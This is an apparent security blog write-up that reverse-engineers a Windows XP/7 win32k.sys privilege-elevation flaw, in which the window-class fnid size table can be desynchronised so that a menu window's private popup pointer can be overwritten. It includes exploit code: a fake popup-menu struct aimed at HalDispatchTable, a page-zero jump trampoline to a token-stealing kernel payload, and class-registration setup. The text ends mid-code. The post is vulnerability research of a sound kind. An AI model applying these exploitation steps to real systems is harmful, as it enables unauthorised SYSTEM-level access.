The Case for SMEP – Exploiting a Kernel Vulnerability

By Gal Badishi | September 20, 2013

Suppose you manage to exploit a vulnerability by directing a user to a malicious web site, or sending someone a specially crafted document. You can execute code at the permission-level of the user that was unfortunate enough to get owned, but he’s not an administrator, and you’re feeling greedy. Now what?

If you want administrator access while running as an unprivileged user on the machine, you need a privilege-elevation vulnerability. Today we are going to discuss a privilege-elevation kernel vulnerability that was presented by Gilad Bakas at Ruxcon 2011. The vulnerability was reported to have been silently fixed by MS in February 2011. Our contributions will be as follows:

We will highlight some differences between the presentation and the disassembled binaries that we work with.
We will dive much much deeper into the code and see the exact steps needed for the attack to succeed.
We will not use the exact same way to trigger the vulnerability as was presented in Ruxcon, but rather a variant thereof. We will also not need the page 0 allocation that is described in the presentation.

Unless noted otherwise, the pseudo-code and disassembled code relate to the 32-bit Windows XP’s user32.dll and win32k.sys binaries, v5.1.2600.5512, dated 14/4/2008. The vulnerability affects Windows 7 as well.

Background

Whenever a window is created by using some user32.dll API function, a kernel object that represents that window is created by win32k.sys. This means that “regular” windows, buttons, menus, tooltips, etc. all have a kernel object that represents them. Each window object is created from a specific class. You can create classes of your own, or use built-in classes of the OS. The kernel class object can be described as follows:

typedef struct tagCLS {
    PCLS          pclsNext;
    ATOM          atomClassName;
    WORD          fnid;
    PDESKTOP      rpdeskParent;
    PDCE          pdce;
    WORD          hTaskWow;
    WORD          CSF_flags;
    LPSTR         lpszClientAnsiMenuName;
    LPWSTR        lpszClientUnicodeMenuName;
    PCALLPROCDATA spcpdFirst;
    PCLS          pclsBase;
    PCLS          pclsClone;
    int           cWndReferenceCount;
    UINT          style;
    WNDPROC       lpfnWndProc;
    int           cbclsExtra;
    int           cbwndExtra;
    HMODULE       hModule;
    PCURSOR       spicn;
    PCURSOR       spcur;
    HBRUSH        hbrBackground;
    LPWSTR        lpszMenuName;
    LPSTR         lpszAnsiClassName;
    PCURSOR       spicnSm;
} CLS, *PCLS;

The following fields are of interest to us in the context of the exploit:

atomClassName: An ATOM that uniquely identifies the class. Some ATOMs are predefined and reserved by the OS for internal classes.
fnid: A number that is supposed to identify the type of window that will be created from this class. For user classes, this is supposed to be 0. For OS classes (e.g., button, menu, etc.) this should be a non-zero number identifying the window type.
cbwndExtra: The number of bytes to allocate in the kernel beyond the basic WND structure that represents a basic window. This way, both the OS and the programmer can create window classes that are based on a “regular” window, but contain extra data that is needed for working with windows of that class.

The basic internal structure of a window is largely as follows:

typedef struct tagWND {
    THRDESKHEAD          head;
    DWORD                dwState;
    DWORD                dwState2;
    DWORD                dwExStyle;
    DWORD                dwStyle;
    HMODULE              hModule;
    WORD                 hMod16;
    WORD                 fnid;
    PWND                 spwndNext;
    PWND                 spwndParent;
    PWND                 spwndChild;
    PWND                 spwndOwner;
    RECT                 rcWindow;
    RECT                 rcClient;
    WNDPROC              lpfnWndProc;
    PCLS                 pcls;
    HRGN                 hrgnUpdate;
    PPROPLIST            ppropList;
    PSBINFO              pSBInfo;
    PMENU                spmenuSys;
    PMENU                spmenu;
    HRGN                 hrgnClip;
    LARGE_UNICODE_STRING strName;
    int                  cbwndExtra;
    PWND                 spwndLastActive;
    HIMC                 hImc;
    ULONG_PTR            dwUserData;
    DWORD                field1;
    DWORD                field2;
} WND, *PWND;

The size of this structure is 0xa4 bytes. Whenever a new window object is created in the kernel, the OS allocates sizeof(WND) + cbwndExtra bytes for the window. If the corresponding window class was created by the OS, it’s the OS that knows what to do with the extra bytes, and is in charge of manipulating them as needed. If the window class was registered by the user, the OS has no knowledge of what the extra bytes mean, and the user is responsible for handling them. Usually, in user-defined windows, cbwndExtra is 0.

To create classes of your own, you may use the functions RegisterClass or RegisterClassEx. Let’s look at what RegisterClassEx does:

ATOM __stdcall RegisterClassExW(const WNDCLASSEXW *pWndClassExW)
{
    ATOM result; // ax@2

    if (pWndClassExW->cbSize == 48)
    {
        result = RegisterClassExWOWW(pWndClassExW, 0, 0, 256);
    }
    else
    {
        UserSetLastError(ERROR_INVALID_PARAMETER);
        result = 0;
    }
    return result;
}

So basically, all the APIs for registering a class end up in a call to RegisterClassExWOW(A/W). The user controls only one parameter to that function, and that’s the first parameter. It turns out that the 3rd parameter is the fnid. Like so:

ATOM __stdcall RegisterClassExWOWW(const WNDCLASSEXW *pWndClassExW, int a2, int fnid, int a4);

Here’s an example where RegisterClassExWOWW is called with non-zero fnids:

int __cdecl RW_RegisterControls()
{
    int flag; // ebx@1
    unsigned int index; // esi@1
    LPCTSTR lpszCursor; // ST0C_4@2
    ATOM res; // ax@2
    WNDCLASSEXW pWndClassExW; // [sp+Ch] [bp-30h]@1

    memset(&pWndClassExW, 0, sizeof(pWndClassExW));
    LOBYTE(flag) = 1;
    pWndClassExW.cbSize = 48;
    pWndClassExW.hInstance = hmodUser;
    index = 0;
    do
    {
        lpszCursor = arrClassInit[index].lpszCursor;
        pWndClassExW.style = arrClassInit[index].style;
        pWndClassExW.lpfnWndProc = arrClassInit[index].lpfnWndProc;
        pWndClassExW.cbWndExtra = arrClassInit[index].cbWndExtra;
        pWndClassExW.hCursor = LoadCursorW(0, (LPCWSTR)lpszCursor);
        pWndClassExW.hbrBackground = arrClassInit[index].hbrBackground;
        pWndClassExW.lpszClassName = (LPCWSTR)arrClassInit[index].lpszClassName;
        res = RegisterClassExWOWW(&pWndClassExW, 0, arrClassInit[index].fnid, 0);
        ++index;
        flag = res != 0 & (unsigned __int8)flag;
    }
    while (index < 9);
    return flag;
}

So we see that the control classes are being registered, and the fnid values are not 0. Let’s take a look at what the array for initializing the controls contains:

struct CLASSINIT {
    UINT    style;
    WNDPROC lpfnWndProcW;
    int     cbWndExtra;
    LPCTSTR lpszCursor;
    HBRUSH  hbrBackground;
    LPCTSTR lpszClassName;
    WORD    fnid;
    WORD    padding;
};

; CLASSINIT arrClassInit[9]
arrClassInit
CLASSINIT <408Bh, offset _ButtonWndProcW@16, 4, 7F00h, 0, offset aButton, 2A1h, 0>
CLASSINIT <408Bh, offset _ComboBoxWndProcW@16, 4, 7F00h, 0, offset aCombobox, 2A2h, 0>
CLASSINIT <4808h, offset _ComboListBoxWndProcW@16, 4, 7F00h, 0, offset aCombolbox, 2A3h, 0>
CLASSINIT <4808h, offset _DefDlgProcW@16, 1Eh, 7F00h, 0, 8002h, 2A4h, 0>
CLASSINIT <4088h, offset _EditWndProcW@16, 6, 7F01h, 0, offset aEdit, 2A5h, 0>
CLASSINIT <4088h, offset _ComboListBoxWndProcW@16, 4, 7F00h, 0, offset aListbox, 2A6h, 0>
CLASSINIT <4000h, offset _MDIClientWndProcW@16, 8, 7F00h, 0Dh, offset aMdiclient, 2A7h, 0>
CLASSINIT <4000h, offset _ImeWndProcW@16, 4, 7F00h, 0, offset aIme, 2A9h, 0>
CLASSINIT <4088h, offset _StaticWndProcW@16, 4, 7F00h, 0, offset aStatic, 2A8h, 0>

We can see that each control class has its own unique fnid, and unlike the user-registered classes, that fnid is not 0. Another interesting thing to note is that every window here has extra bytes for more information other than the regular WND structure.

The function RegisterClassExWOWW is not exported. However, we can easily get to it by dynamically disassembling the code of RegisterClassExW and finding the call to RegisterClassExWOWW. By calling RegisterClassExWOWW directly, we are able to control its 3rd argument, the fnid. But how does this help us?
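As an aside, the lookup described above can be sketched in portable C. This is only a rough illustration, not the code used for the exploit: the helper name find_first_call_target and the sample bytes are hypothetical, and the scan naively assumes that the first 0xE8 byte in the function body is the CALL opcode rather than part of an operand. A real implementation would walk the instructions with a length disassembler.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper: scan `code` for the first 0xE8 byte (x86 CALL rel32)
 * and return the call target, assuming the buffer is mapped at virtual
 * address `base`. Returns 0 if no candidate is found.
 * Assumption: the first 0xE8 byte really is an opcode, not operand data.
 */
static uint32_t find_first_call_target(const uint8_t *code, size_t len, uint32_t base)
{
    assert(code != NULL);
    for (size_t i = 0; i + 5 <= len; i++) {
        if (code[i] == 0xE8) {
            /* Assemble the little-endian 32-bit displacement. */
            uint32_t rel = (uint32_t)code[i + 1]
                         | ((uint32_t)code[i + 2] << 8)
                         | ((uint32_t)code[i + 3] << 16)
                         | ((uint32_t)code[i + 4] << 24);
            /* Target = address of the next instruction + displacement. */
            return base + (uint32_t)i + 5u + rel;
        }
    }
    return 0;
}

/* Synthetic bytes for illustration only; not taken from user32.dll. */
static const uint8_t sample_stub[] = {
    0x6A, 0x00,                   /* push 0      */
    0x6A, 0x00,                   /* push 0      */
    0x50,                         /* push eax    */
    0xE8, 0x10, 0x00, 0x00, 0x00, /* call +0x10  */
    0xC3                          /* ret         */
};
```

With the sample mapped at 0x1000, the CALL sits at 0x1005, the next instruction at 0x100A, and the computed target is 0x101A.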

When a user registers a class and asks for extra bytes, he needs a way to change them later. Since the real window object is in kernel memory, the user cannot access the extra bytes directly, and so must use an API function such as SetWindowLong. SetWindowLong can be used to change values in the WND structure itself (like style), or in the extra bytes that come after it, with one exception: you cannot change the extra bytes allocated by the system for internal classes (fnid != 0). These are considered private bytes and can only be changed by the system. The way the system determines whether we are trying to overwrite the private bytes is by consulting a private table (in a global SERVERINFO structure) that contains the cbWndExtra values for all system fnids. This mechanism allows support for both private bytes and user bytes in the same internal window class.

SetWindowLong in user32.dll eventually calls NtUserSetWindowLong in win32k.sys, which in turn calls the function that does the real work, xxxSetWindowLong. The pseudo-code for the relevant parts of the function goes something like this:

int __stdcall xxxSetWindowLong(PWND pWnd, int nIndex, ULONG dwNewLong, BOOL isANSI)
{
	// Don't allow user threads to change windows of system threads
	if (!FCallerOk(pWnd))
		SetErrorAndReturn(ERROR_ACCESS_DENIED);
	// Check if this is a window created from a system class (using the fnid)
	if ((pWnd->fnid & 0x3FFF) != 0) {
		if (!isDialogWindow(pWnd)) {
			// Check if we're trying to set the window's private data
			if (nIndex >= 0 && nIndex < gpsi->cbFnidWndSize[pWnd->fnid] - sizeof(WND)) {
				if (isFnidControl(pWnd->fnid) || isFnidIME(pWnd->fnid) /* || ... */)
					if (nIndex == 0 && (*(PVOID *)(pWnd + 1) == NULL || isDestroyed(pWnd)))
						// No such function - just for brevity
						return SetTheLong(pWnd, nIndex, dwNewLong);
				if (isFnidMDI(pWnd->fnid))
					if (nIndex == 0 || (nIndex == 4 && (*(PVOID *)(pWnd + 1) == NULL || isDestroyed(pWnd))))
						return SetTheLong(pWnd, nIndex, dwNewLong);
				SetErrorAndReturn(ERROR_INVALID_INDEX);
			}
		}
		// Dialog window - not interesting
		else {
			// Allow setting some values or return with an error
		}
	}
	// Negative indices address fields of the WND structure itself
	if (nIndex < 0)
		return xxxSetWindowData(pWnd, nIndex, dwNewLong, isANSI);
	// Check that we're not crossing the end of the extra bytes when writing
	else
		if (nIndex + sizeof(LONG) > pWnd->cbwndExtra)
			SetErrorAndReturn(ERROR_INVALID_INDEX);
		else
			return SetTheLong(pWnd, nIndex, dwNewLong);
}

So, in order to successfully set a window’s long beyond the WND structure part, disregarding dialog windows, we must make sure that:

0 <= nIndex <= pWnd->cbwndExtra - sizeof(LONG).
If pWnd->fnid != 0, then nIndex >= gpsi->cbFnidWndSize[pWnd->fnid] - sizeof(WND) (or nIndex == 0 and the window is currently being created or destroyed).
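The two conditions can be modelled as a small predicate. This is a simplified sketch rather than the kernel's code: the function name may_write_extra_long and its parameters are illustrative, and the model deliberately leaves out dialog windows, the MDI special cases, and the "window is being created or destroyed" exception.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define SIZEOF_WND 0xA4   /* sizeof(WND) on the 32-bit XP build discussed here */

/*
 * Simplified model of the index checks in xxxSetWindowLong.
 *   fnid          - pWnd->fnid & 0x3FFF (0 for user classes)
 *   fnid_wnd_size - the table entry: sizeof(WND) + private bytes for that fnid
 *   cbwnd_extra   - pWnd->cbwndExtra
 *   n_index       - byte offset into the extra bytes (must be >= 0)
 */
static bool may_write_extra_long(uint16_t fnid, uint16_t fnid_wnd_size,
                                 int cbwnd_extra, int n_index)
{
    /* Negative indices are routed to xxxSetWindowData, not modelled here. */
    assert(n_index >= 0);

    /* System class: offsets inside the private area are rejected. */
    if (fnid != 0 && n_index < (int)fnid_wnd_size - SIZEOF_WND)
        return false;

    /* The 4-byte write must end within the extra bytes. */
    return n_index + (int)sizeof(int32_t) <= cbwnd_extra;
}
```

Note that the first check trusts the table entry while the second trusts the window's own cbwndExtra. The two values come from different places, which is the detail the rest of the post builds on.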

Enough background for now. Let’s go smash some pointers, shall we?

The Vulnerability

The background part has already given us two interesting facts:

We can use RegisterClassExWOWW to supply a non-zero fnid.
xxxSetWindowLong uses values associated with the fnid to determine whether or not we’re trashing private data.

The second point is very important: there can be a disparity between the fnid table holding the assumed size of the object, and sizeof(WND) + pWnd->cbwndExtra, representing the actual size of the object. If we can create such a disparity, we can trick the checking code into thinking that we’re not overwriting private data, but rather just writing some “regular” extra bytes. In order to do so, we’ll need to find a way to modify the fnid table.

RegisterClassExWOWW in user32.dll calls NtUserRegisterClassExWOW in win32k.sys. Eventually, NtUserRegisterClassExWOW does the following:

if ( *(_QWORD *)&wndClassEx.cbClsExtra < 0i64 || wndClassEx.cbSize != 48 )
    UserSetLastError(ERROR_INVALID_PARAMETER);
else
    v23 = xxxRegisterClassEx(&wndClassEx, &v27, FNID, csfFlags, v22);

Note that the structure used for registering the class is checked, and the function fails if either cbClsExtra or cbWndExtra is negative. This is in contrast to what is implied in the Ruxcon presentation, where a negative value is used for cbWndExtra when registering the malicious class. This is one place where we have to diverge from the presentation. Other places will soon follow.

xxxRegisterClassEx calls InternalRegisterClassEx, where we find this piece of code (pcls is the pointer to the class object that we’re currently registering):

if (FNID)
    *(_WORD *)(gpsi + 2 * (FNID & 0x3FFF) - 0x48C) = LOWORD(pcls->cbWndExtra) + 0xA4;

Let me put that in an easier-to-digest form:

if (FNID)
    gpsi->cbFnidWndSize[FNID] = LOWORD(pcls->cbWndExtra) + sizeof(WND);

This means that if we register a class using a system fnid, the entry in the table that stores the assumed size of the corresponding windows is modified, while the cbWndExtra field in the corresponding system class stays the same. Disparity achieved.
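To make the disparity concrete, here is a minimal model of the table update. It is a sketch under stated assumptions: the function names are made up for illustration, the table entry is passed around as a plain value instead of living in gpsi, and the only behaviour modelled is the assignment shown in the snippet above.

```c
#include <assert.h>
#include <stdint.h>

#define SIZEOF_WND 0xA4   /* sizeof(WND) on the 32-bit XP build discussed here */

/*
 * Models: if (FNID) table[FNID] = LOWORD(pcls->cbWndExtra) + sizeof(WND);
 * Returns the table entry as it looks after registering a class with the
 * given fnid and cbWndExtra.
 */
static uint16_t table_entry_after_register(uint16_t current_entry,
                                           uint16_t fnid, int cbwnd_extra)
{
    /* NtUserRegisterClassExWOW rejects negative values before we get here. */
    assert(cbwnd_extra >= 0);
    if (fnid)
        return (uint16_t)((cbwnd_extra & 0xFFFF) + SIZEOF_WND);
    return current_entry;   /* user classes (fnid == 0) leave the table alone */
}

/*
 * Bytes that the system class still allocates as private data but that the
 * table no longer reports as private.
 */
static int unprotected_private_bytes(int system_cls_cbwnd_extra, uint16_t table_entry)
{
    return system_cls_cbwnd_extra - ((int)table_entry - SIZEOF_WND);
}
```

For a system class with 4 private bytes and an original table entry of sizeof(WND) + 4, registering a second class with the same fnid and cbWndExtra == 0 drops the entry to sizeof(WND), leaving all 4 bytes unprotected.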

To abuse this disparity, we need to do the following:

1. Find an interesting system class with private data (pclsSystem->cbWndExtra >= gpsi->cbFnidWndSize[fnidSystem] - sizeof(WND) > 0).
2. Register a class using fnidSystem and pclsUser->cbWndExtra == 0. Now we get that pclsSystem->cbWndExtra > gpsi->cbFnidWndSize[fnidSystem] - sizeof(WND) (which is 0).
3. Create a window using the system class. The Ruxcon presentation is not explicit about which window class to create (the malformed or the original), but we will later see why we must use the actual system class.
4. Trash the window’s private data using SetWindowLong with an offset of 0 (or whatever is applicable).
5. Make use of it.

Note that every once in a while (presumably whenever a GUI thread is created), the global gpsi->cbFnidWndSize[fnidSystem] will be overwritten to revert to its original state. Why anyone would want that is beyond me, but in this case it doesn’t really matter to us, because the periods between such resets are very long compared to the time it takes to complete steps 2 to 4.

The Ruxcon presentation suggests overwriting the private data of a menu object. To see why, let’s see some properties of menus.

When win32k.sys is loaded into memory, its DriverEntry function calls Win32UserInitialize, which in turn calls SetupClassAtoms. In there we can find:

*(_WORD *)(gpsi + 0x1E2) = 0x8002u;           // Dialog
*(_WORD *)(gpsi + 0x1E8) = 0x8004u;           // Icon title
*(_WORD *)(gpsi + 0x1EA) = 0x8006u;           // Tooltip
*(_WORD *)(gpsi + 0x1E0) = 0x8001u;           // Desktop
*(_WORD *)(gpsi + 0x1E6) = 0x8003u;           // Switch
*(_WORD *)(gpsi + 0x1E4) = 0x8000u;           // Menu

The values are taken from here. But what if we want to validate the docs? How do we know that 0x8000 is indeed the menu class atom? Let’s take a look at xxxTrackPopupMenuEx, which actually creates a menu window:

v14 = xxxCreateWindowEx(
	  0x181,
	  (LPCWSTR)0x8000,
	  (LPCWSTR)0x8000,
	  0,
	  0x80800000u,
	  pt.x,
	  pt.y,
	  100,
	  100,
	  (tagWND *)((*(_DWORD *)(a1 + 20) & 0x40000000) != 0 ? a4 : 0),
	  0,
	  *(HINSTANCE *)(a4 + 36),
	  0,
	  0x501u,
	  0);

So that’s how we know that. Speaking of creating a menu window, in the menu’s window procedure, xxxMenuWindowProc, we can find something like this:

if (pMenuWnd->fnid != 0x29C) {
	// Either return, or set pMenuWnd->fnid to 0x29C
}

So the fnid for a menu is 0x29c. Recall from the InternalRegisterClassEx snippet that gpsi + 2 * fnid - 0x48c holds the size of the window object for a given fnid. Since FNID_MENU is 0x29c, we get that gpsi + 0xac holds the size of the menu window object (the one we would like to overwrite). The function InitFunctionTables (also called from Win32UserInitialize) shows us this:
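The offset arithmetic is easy to get wrong by hand, so here it is as a tiny helper. The function name fnid_size_slot_offset is illustrative; the expression itself is the decompiled one, 2 * (FNID & 0x3FFF) - 0x48C.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Byte offset from gpsi of the window-size slot for `fnid`, following the
 * decompiled expression gpsi + 2 * (FNID & 0x3FFF) - 0x48C.
 */
static uint32_t fnid_size_slot_offset(uint32_t fnid)
{
    uint32_t scaled = 2u * (fnid & 0x3FFFu);
    /* Smaller fnids would point before gpsi, so they are not valid here. */
    assert(scaled >= 0x48Cu);
    return scaled - 0x48Cu;
}
```

For the menu fnid: 2 * 0x29C = 0x538, and 0x538 - 0x48C = 0xAC.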

*(_DWORD *)(gpsi + 0x8C) = xxxSBWndProc;
*(_DWORD *)(gpsi + 0x90) = xxxDefWindowProc;
*(_DWORD *)(gpsi + 0x94) = xxxMenuWindowProc;
*(_DWORD *)(gpsi + 0x98) = xxxDesktopWndProc;
*(_DWORD *)(gpsi + 0x9C) = xxxDefWindowProc;
*(_DWORD *)(gpsi + 0xA0) = xxxDefWindowProc;
*(_WORD *)(gpsi + 0xA8) = 0xECu;
*(_WORD *)(gpsi + 0xAA) = 0xA4u;
*(_WORD *)(gpsi + 0xAC) = 0xA8u;

So the size of a menu window object is 0xa8. This is sizeof(WND) + 4, which means that a menu window has 4 bytes of private data we can overwrite. Let’s see what this data is:

typedef struct tagMENUWND {
    WND         wnd;
    PPOPUPMENU  ppopupmenu;
} MENUWND, *PMENUWND;

Where:

typedef struct tagPOPUPMENU {
    DWORD       dwFlags;
    PWND        spwndNotify;
    PWND        spwndPopupMenu;
    PWND        spwndNextPopup;
    PWND        spwndPrevPopup;
    PMENU       spmenu;
    PMENU       spmenuAlternate;
    PWND        spwndActivePopup;
    PPOPUPMENU  ppopupmenuRoot;
    PPOPUPMENU  ppmDelayedFree;
    UINT        posSelectedItem;
    UINT        posDropped;
} POPUPMENU, *PPOPUPMENU;

Upon creating the new menu window, a WM_NCCREATE message will be sent to the window and handled by xxxMenuWindowProc like so:

if (msg == WM_NCCREATE)
{
    if (pMenuWnd->ppopupmenu || (pPopupMenu = MNAllocPopup(1)) == 0)
        return 0;
    pMenuWnd->ppopupmenu = pPopupMenu;
    pPopupMenu->posSelectedItem = -1;
    HMAssignmentLock(&pPopupMenu->spwndPopupMenu, pMenuWnd);
}

So the popup menu itself is allocated upon creation of the window, if it doesn’t yet exist. Upon destruction of the window, the WM_FINALDESTROY message is processed by xxxMenuWindowProc, which calls xxxMNDestroyHandler, passing it the pointer to the popup menu that was created upon receiving WM_NCCREATE and associated with the menu window.

Since our course of action would be to overwrite the pointer to the popup menu, we need to look closely at what exactly xxxMNDestroyHandler does. On the one hand, we may find spots that will help us overwrite other values in memory. On the other hand, we must be careful and make sure the values we supply don’t cause the kernel to collapse.

Here is the important information from xxxMNDestroyHandler:

If ppopupmenu->spwndNextPopup != NULL it sends an MN_CLOSEHIERARCHY message to either ppopupmenu->spwndPopupMenu or ppopupmenu->spwndNextPopup.
If ppopupmenu->spmenu != NULL and an item is selected, it accesses and manipulates values referenced by ppopupmenu->spmenu.
If the flag 0x2000 is set in ppopupmenu->dwFlags, it calls _KillTimer(ppopupmenu->spwndPopupMenu, 0xFFFEu), which manipulates values related to ppopupmenu->spwndPopupMenu.
If the flag 0x4000 is set, almost the same thing happens, except the argument to _KillTimer is 0xFFFF.
If the flag 0x200000 is set and ppopupmenu->spwndNotify != NULL, it sends a WM_UNINITMENUPOPUP message to ppopupmenu->spwndNotify.
It sets the flag 0x8000, indicating that the popup menu is destroyed. This is a write operation into arbitrary memory that we can use to our advantage if we want to.
If the flag 0x800000 is not set, and ppopupmenu->spwndPopupMenu != NULL, it nulls ppopupmenu->spwndPopupMenu->ppopupmenu. This is a write operation through 2 dereferences. The destination can be controlled by us or not, depending on how we choose to exploit the target.
If the flag 0x10000 is not set, it calls MNFreePopup(ppopupmenu).
If the flag 0x10000 is set and ppopupmenu->ppopupmenuRoot != NULL, it manipulates values in ppopupmenu->ppopupmenuRoot.

So right now we have a mandatory write (OR operation) that is going to happen, plus a NULL write that might happen (through double-dereference), and a call to MNFreePopup that might also happen. Let us see what MNFreePopup does:

If ppopupmenu == ppopupmenu->ppopupmenuRoot, it calls MNFlushDestroyedPopups.
It unlocks all the windows and menus pointed at by ppopupmenu, if they are not NULL. This includes decrementing cLockObj in head by 1 for every window/menu, and then nulling the appropriate pointer.
If the flag 0x800000 is set in ppopupmenu->dwFlags, it nulls ppopupmenu->ppopupmenuRoot.
If the flag 0x800000 is not set, it performs another check that is going to fail and then lead you to HeavyFreePool(ppopupmenu). Assuming you have overwritten that pointer with your value, if you get here you are guaranteed a BSOD.

Armed with all this knowledge, we can now go and write our exploit.

Exploitation Details

The images in the Ruxcon presentation make it seem as if an arbitrary overwrite using just one dereference (ppopupmenu) is viable. Unfortunately, we have seen all the hurdles that await us if we try to do it that way. We might access memory regions that we’re not allowed to access, and change kernel memory in ways that we’ll regret afterwards. It is best if we stick to the double-dereference nulling of a pointer through ppopupmenu->spwndPopupMenu. We will direct ppopupmenu to memory completely under our control, and then control the single value that will be nulled. Note that if we get to MNFreePopup, this will also mean that spwndPopupMenu will get “unlocked”, thereby decrementing a value through the spwndPopupMenu pointer. We will use this side-effect to our advantage later.

One other thing we want to do is to avoid calling MNFreePopup, the main reason being that in order to reach the double-dereference nulling, we need flag 0x800000 (desktop menu) to not be set. However, if we reach MNFreePopup with that flag not set, it calls HeavyFreePool and we get a BSOD. To avoid this we must set flag 0x10000 (delayed free). So, in principle, we want the entire POPUPMENU structure to be 0, except dwFlags, which should be 0x10000, and spwndPopupMenu, which should point to the area we want to overwrite (spwndPopupMenu->ppopupmenu is going to be nulled).
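The flag reasoning above can be checked with a toy model of the two branches we care about. This is only a sketch of the behaviour listed earlier for xxxMNDestroyHandler, not a reimplementation: the PM_* and OUT_* names are invented for illustration, and every other branch of the handler is ignored.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Flag values as described in the text; the names are illustrative. */
#define PM_DELAYED_FREE 0x00010000u
#define PM_DESKTOP_MENU 0x00800000u

enum {
    OUT_NULL_WRITE = 1,   /* spwndPopupMenu->ppopupmenu = NULL is executed */
    OUT_FREE_POPUP = 2    /* MNFreePopup(ppopupmenu) is called             */
};

/* Which of the two interesting actions happen for a given dwFlags value? */
static unsigned destroy_handler_outcome(uint32_t dw_flags, bool has_spwnd_popup_menu)
{
    unsigned out = 0;
    if (!(dw_flags & PM_DESKTOP_MENU) && has_spwnd_popup_menu)
        out |= OUT_NULL_WRITE;
    if (!(dw_flags & PM_DELAYED_FREE))
        out |= OUT_FREE_POPUP;
    return out;
}

/* Sanity check of the configuration chosen in the text. */
static void check_chosen_configuration(void)
{
    /* Only "delayed free" set: the NULL write happens, MNFreePopup does not. */
    assert(destroy_handler_outcome(PM_DELAYED_FREE, true) == OUT_NULL_WRITE);
}
```

With dwFlags == 0 the model reports both actions, which corresponds to the HeavyFreePool crash path; with only the delayed-free flag set, the NULL write is the sole effect.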

In this example, we’re going to use the well-known technique of overwriting HalDispatchTable’s entry for NtQueryIntervalProfile. That’s the second entry, meaning 4 bytes from the start of HalDispatchTable. We know that the nulling command is ppopupmenu->spwndPopupMenu->ppopupmenu = NULL. We also know that ppopupmenu in MENUWND comes right after the WND structure, meaning starting at byte 0xa4. Thus, we need spwndPopupMenu to point 0xa4 bytes before the address we want to overwrite. Here is the setup:

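tagPOPUPMENU tpm;	/* fake popup menu, lives in user memory */

memset(&tpm, 0, sizeof(tpm));
/* (HalDispatchTable + 4) - 0xA4: spwndPopupMenu->ppopupmenu aliases the second table entry */
tpm.spwndPopupMenu = (DWORD)HalDispatchTable - 0xA0;
tpm.dwFlags = FLAG_DELAYED_FREE;	/* 0x10000 */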
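The 0xA0 constant comes from combining two offsets, which the following sketch spells out. The function name and macro names are illustrative, and the addresses are treated as plain 32-bit integers so the arithmetic can be checked outside the kernel.

```c
#include <assert.h>
#include <stdint.h>

#define SIZEOF_WND            0xA4u  /* offset of ppopupmenu inside MENUWND     */
#define HAL_QUERY_PROFILE_OFF 0x4u   /* second entry of HalDispatchTable, 32-bit */

/*
 * Value to store in spwndPopupMenu so that spwndPopupMenu->ppopupmenu
 * aliases the DWORD at hal_dispatch_table + 4.
 */
static uint32_t fake_spwnd_for_target(uint32_t hal_dispatch_table)
{
    uint32_t target   = hal_dispatch_table + HAL_QUERY_PROFILE_OFF;
    uint32_t fake_wnd = target - SIZEOF_WND;
    /* The kernel adds 0xA4 back when it dereferences ->ppopupmenu. */
    assert(fake_wnd + SIZEOF_WND == target);
    return fake_wnd;
}
```

Since 4 - 0xA4 = -0xA0, the result is always the table address minus 0xA0, matching the constant in the setup code.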

The code we will put in page 0 is a simple jump to our C function. The function itself can do a very straightforward procedure like changing the process’s token to have SYSTEM privileges. As our exploit is agnostic to what code we’re going to run, we can just use any privilege elevation code that runs from the kernel (perhaps wrapping it with a stack-preserving function):

BOOL AllocateTrampoline(LPVOID *addr) {
	BOOL res = FALSE;
	HMODULE hModule;
	LPVOID trampAddr;
	SIZE_T size = 5;	// opcode byte + 32-bit displacement
	_NtAllocateVirtualMemory NtAllocateVirtualMemory;

	if (addr == NULL)
		return FALSE;
	// Remember where the jump will be written (may be address 0)
	trampAddr = *addr;
	// A NULL base means "pick any address", so ask for address 1 instead;
	// the allocation is rounded down to the start of page 0
	if (*addr == NULL)
		*addr = (LPVOID)1;
	if ((hModule = LoadLibrary(L"ntdll")) == NULL)
		return FALSE;
	NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(hModule, "NtAllocateVirtualMemory");
	if (NtAllocateVirtualMemory)
		// (HANDLE)-1 is the pseudo-handle for the current process
		if (NtAllocateVirtualMemory((HANDLE)-1, addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == 0) {
			// jmp rel32 to the kernel payload
			*(BYTE *)trampAddr = 0xE9;
			*(ULONG_PTR *)((BYTE *)trampAddr + 1) = (ULONG_PTR)KernelShellcodePatchToken - (ULONG_PTR)trampAddr - 5;
			res = TRUE;
		}
	FreeLibrary(hModule);
	return res;
}
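The two writes at the end of AllocateTrampoline encode an x86 jmp rel32 instruction. The encoding can be reproduced in isolation as follows; this is a standalone sketch with hypothetical helper names, using plain 32-bit integers instead of real pointers.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Encode `jmp rel32` (opcode 0xE9) into out[0..4] for a stub located at
 * virtual address stub_va that jumps to target_va (32-bit x86).
 */
static void encode_jmp_rel32(uint8_t out[5], uint32_t stub_va, uint32_t target_va)
{
    /* The displacement is relative to the instruction after the 5-byte jmp. */
    uint32_t rel = target_va - stub_va - 5u;
    assert(out != 0);
    out[0] = 0xE9;
    out[1] = (uint8_t)(rel);
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
}

/* Convenience wrapper: encode, then read the displacement back. */
static uint32_t jmp_rel32_displacement(uint32_t stub_va, uint32_t target_va)
{
    uint8_t buf[5];
    encode_jmp_rel32(buf, stub_va, target_va);
    return (uint32_t)buf[1]
         | ((uint32_t)buf[2] << 8)
         | ((uint32_t)buf[3] << 16)
         | ((uint32_t)buf[4] << 24);
}
```

For a stub at address 0 and a payload at a hypothetical 0x00401000, the displacement is 0x00400FFB, so the five bytes written to page 0 would be E9 FB 0F 40 00.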

And then:

printf("[*] Preparing trampoline... ");
addr = NULL;
SUCCESS_OR_FAIL(AllocateTrampoline(&addr));

The next thing we want to do is to create the disparity between the size of the fnid window saved in gpsi, and the size reported by the actual menu window class:

/* Change the fnid table to have just 0 extra bytes instead of 4 for the menu class */
ZeroMemory(&wndClassEx, sizeof(wndClassEx));
wndClassEx.cbSize = sizeof(wndClassEx);
wndClassEx.style = CS_HREDRAW | CS_VREDRAW;
wndClassEx.lpfnWndProc = WindowProc;
wndClassEx.cbWndExtra = 0;
